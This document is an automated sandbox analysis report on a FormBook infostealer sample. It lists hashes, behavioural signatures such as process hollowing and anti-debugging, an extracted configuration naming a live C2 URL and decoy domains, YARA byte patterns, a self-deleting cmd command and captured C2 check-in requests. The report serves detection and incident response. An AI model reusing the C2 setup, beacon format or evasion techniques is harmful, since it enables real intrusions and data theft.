Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name:TazxfJHRhq.exe
Analysis ID:383852
MD5:f818665dd48a93c48255d3ceadf92a6e
SHA1:2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256:6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TazxfJHRhq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TazxfJHRhq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TazxfJHRhq.exeVirustotal: Detection: 14%Perma Link
          Source: TazxfJHRhq.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.4af7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.6bd538.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: TazxfJHRhq.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.autotrafficbot.com/evpn/
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
          Source: Joe Sandbox ViewASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.jamessicilia.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 08 Apr 2021 09:10:22 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
